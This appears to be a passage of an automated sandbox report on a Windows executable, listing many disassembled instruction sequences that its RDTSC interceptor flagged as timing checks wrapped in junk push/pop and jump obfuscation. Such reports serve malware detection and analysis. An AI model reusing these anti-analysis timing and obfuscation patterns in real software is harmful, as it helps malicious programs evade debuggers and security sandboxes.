Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F3845 second address: 9F3867 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F68C0520B46h 0x00000008 jmp 00007F68C0520B55h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F39A2 second address: 9F39A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F3F22 second address: 9F3F2D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F68C0520B46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F3F2D second address: 9F3F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F4044 second address: 9F404A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F8C47 second address: 9F8C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F68C0B5CAEFh 0x0000000e popad 0x0000000f push ecx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F9212 second address: 9F921C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F68C0520B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F921C second address: 9F9220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F9220 second address: 9F9228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F8806 second address: 9F880C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F880C second address: 9F8834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0520B50h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F68C0520B4Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F9A9A second address: 9F9AA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9FF665 second address: 9FF69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007F68C0520B46h 0x0000000c popad 0x0000000d push edi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 pop ebx 0x00000012 pushad 0x00000013 jmp 00007F68C0520B51h 0x00000018 jnp 00007F68C0520B52h 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A01C85 second address: A01C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 987404 second address: 987410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F68C0520B46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A06609 second address: A0660D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0660D second address: A06617 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F68C0520B46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A06781 second address: A06787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A06787 second address: A0678B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A06A40 second address: A06A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0B5CAF5h 0x00000009 je 00007F68C0B5CAE6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F68C0B5CAEAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A06BE2 second address: A06BFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B53h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A06BFF second address: A06C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0712B second address: A07150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jmp 00007F68C0520B4Ah 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F68C0520B4Dh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0742D second address: A0743A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F68C0B5CAE6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0743A second address: A07451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F68C0520B46h 0x00000009 jmp 00007F68C0520B4Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9AE656 second address: 9AE665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F68C0B5CAE6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9AE665 second address: 9AE669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A07837 second address: A0788A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F68C0B5CAECh 0x0000000d jc 00007F68C0B5CAE6h 0x00000013 popad 0x00000014 pushad 0x00000015 jnc 00007F68C0B5CAE8h 0x0000001b jp 00007F68C0B5CAFAh 0x00000021 jmp 00007F68C0B5CAF7h 0x00000026 push eax 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0AC35 second address: A0AC3C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0F34B second address: A0F34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0F34F second address: A0F37B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F68C0520B46h 0x00000008 jmp 00007F68C0520B59h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 je 00007F68C0520B46h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0F37B second address: A0F387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0F387 second address: A0F38B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0F38B second address: A0F39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F68C0B5CAEBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0F39E second address: A0F3A8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F68C0520B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0E288 second address: A0E2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F68C0B5CAF3h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CD2FF second address: 9CD315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b jp 00007F68C0520B50h 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CD315 second address: 9ADB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+1244F308h], eax 0x0000000c call dword ptr [ebp+122D3588h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 jnp 00007F68C0B5CAF2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CDA9B second address: 9CDAE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F68C0520B48h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push esi 0x00000015 jnc 00007F68C0520B46h 0x0000001b pop esi 0x0000001c pop eax 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F68C0520B54h 0x00000028 push eax 0x00000029 pop eax 0x0000002a popad 0x0000002b pop edx 0x0000002c mov eax, dword ptr [eax] 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CDAE7 second address: 9CDAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CDD13 second address: 9CDD17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CDD17 second address: 9CDD31 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F68C0B5CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F68C0B5CAECh 0x00000014 jng 00007F68C0B5CAE6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CDD31 second address: 9CDD38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CDD38 second address: 9CDD94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 mov dword ptr [ebp+122D2AFEh], eax 0x0000000f pop ecx 0x00000010 push 00000004h 0x00000012 call 00007F68C0B5CAF9h 0x00000017 call 00007F68C0B5CAF6h 0x0000001c jmp 00007F68C0B5CAEEh 0x00000021 pop ecx 0x00000022 pop edx 0x00000023 nop 0x00000024 jp 00007F68C0B5CAFDh 0x0000002a push eax 0x0000002b push edx 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CE54B second address: 9CE551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CE551 second address: 9CE55B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F68C0B5CAE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9AE69B second address: 9AE69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9AE69F second address: 9AE6AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9AE6AB second address: 9AE6AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0E7C9 second address: A0E7D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnc 00007F68C0B5CAE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0E965 second address: A0E995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jo 00007F68C0520B5Ah 0x00000010 jbe 00007F68C0520B48h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0EB0E second address: A0EB3E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F68C0B5CAE6h 0x00000009 ja 00007F68C0B5CAE6h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 jmp 00007F68C0B5CAF9h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0EB3E second address: A0EB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0520B54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0EC9B second address: A0ECA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0ECA2 second address: A0ECAC instructions: 0x00000000 rdtsc 0x00000002 je 00007F68C0520B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0EE00 second address: A0EE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F68C0B5CAE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F68C0B5CAE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A0EE13 second address: A0EE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A11D16 second address: A11D29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68C0B5CAEDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A11EC9 second address: A11EFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B55h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F68C0520B51h 0x00000012 jng 00007F68C0520B46h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A11EFD second address: A11F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A11F03 second address: A11F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F68C0520B4Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A11F18 second address: A11F3A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007F68C0B5CAE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F68C0B5CAEEh 0x00000013 ja 00007F68C0B5CAE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A11F3A second address: A11F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A12071 second address: A1208C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0B5CAF7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1208C second address: A120EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007F68C0520B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F68C0520B5Fh 0x00000012 pop esi 0x00000013 pushad 0x00000014 jmp 00007F68C0520B4Bh 0x00000019 jmp 00007F68C0520B58h 0x0000001e pushad 0x0000001f jmp 00007F68C0520B50h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A120EF second address: A120F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A12238 second address: A1225B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F68C0520B5Ah 0x0000000c jmp 00007F68C0520B54h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1225B second address: A1227E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F68C0B5CAF8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1227E second address: A122A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0520B58h 0x00000009 jnp 00007F68C0520B46h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1466E second address: A14674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A14674 second address: A14694 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F68C0520B57h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A19185 second address: A19189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A19789 second address: A1978F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1978F second address: A197A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F68C0B5CAE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A197A0 second address: A197BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A197BB second address: A197DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F68C0B5CAE6h 0x0000000a jmp 00007F68C0B5CAF3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A197DA second address: A197E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A197E3 second address: A197F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F68C0B5CAECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A197F4 second address: A19800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F68C0520B48h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F205 second address: A1F23B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F68C0B5CAF9h 0x0000000d jmp 00007F68C0B5CAF5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F23B second address: A1F245 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F68C0520B46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F78A second address: A1F797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F797 second address: A1F7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F68C0520B48h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F7A4 second address: A1F7AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F7AA second address: A1F7C3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F68C0520B46h 0x00000008 jmp 00007F68C0520B4Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F7C3 second address: A1F7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F919 second address: A1F936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F936 second address: A1F93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
